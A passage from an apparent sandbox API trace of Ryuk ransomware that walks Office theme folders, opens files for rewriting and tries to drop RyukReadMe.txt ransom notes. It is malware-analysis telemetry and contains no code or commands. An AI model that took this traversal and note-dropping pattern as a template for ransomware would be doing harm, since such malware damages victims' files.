returned 0 [0133.155] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.156] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.156] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.156] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.156] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.156] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM", dwFileAttributes=0x80) returned 0 [0133.157] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.157] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.157] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.157] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.157] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.158] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF", dwFileAttributes=0x80) returned 0 [0133.158] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.158] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.158] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.158] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.158] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.158] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.158] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.158] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.158] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.158] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.158] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.159] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.159] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.159] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.159] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.159] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.159] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.159] SetLastError (dwErrCode=0x0) [0133.159] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.159] GetLastError () returned 0x5 [0133.159] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.159] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.159] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.159] SetLastError (dwErrCode=0x0) [0133.159] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.160] GetLastError () returned 0x5 [0133.160] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.160] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.160] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.160] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.160] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.160] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM", dwFileAttributes=0x80) returned 0 [0133.161] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.161] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.161] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.161] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.161] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF", dwFileAttributes=0x80) returned 0 [0133.162] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.162] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.162] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.162] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.162] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.162] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.163] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.163] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.163] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.163] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.163] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.163] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.163] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.164] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.164] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.164] SetLastError (dwErrCode=0x0) [0133.164] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.164] GetLastError () returned 0x5 [0133.164] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.164] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.164] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.164] SetLastError (dwErrCode=0x0) [0133.164] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.164] GetLastError () returned 0x5 [0133.164] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.164] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.164] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.165] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.165] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.165] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.165] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM", dwFileAttributes=0x80) returned 0 [0133.165] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.165] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.165] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.165] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.165] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.166] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF", dwFileAttributes=0x80) returned 0 [0133.166] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.166] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.166] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.166] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.166] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.166] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.166] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.166] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.166] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.167] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.167] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.167] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.167] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.167] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.167] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.167] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.167] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.167] SetLastError (dwErrCode=0x0) [0133.167] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.167] GetLastError () returned 0x5 [0133.167] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.167] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.167] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.167] SetLastError (dwErrCode=0x0) [0133.167] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.168] GetLastError () returned 0x5 [0133.168] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.168] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.168] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.168] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.168] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.168] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM", dwFileAttributes=0x80) returned 0 [0133.169] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.169] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.169] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.169] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.169] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF", dwFileAttributes=0x80) returned 0 [0133.170] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.170] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.170] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.170] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.170] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.170] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.170] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.170] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.171] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.171] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.171] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.171] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.171] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.171] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.171] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.171] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.171] SetLastError (dwErrCode=0x0) [0133.171] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.171] GetLastError () returned 0x5 [0133.171] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.171] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.171] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.172] SetLastError (dwErrCode=0x0) [0133.172] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.172] GetLastError () returned 0x5 [0133.172] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.172] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.172] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.172] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.172] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.172] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM", dwFileAttributes=0x80) returned 0 [0133.172] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.172] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.172] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.173] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.173] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.173] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF", dwFileAttributes=0x80) returned 0 [0133.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.173] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.174] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.174] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.174] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.174] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.174] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 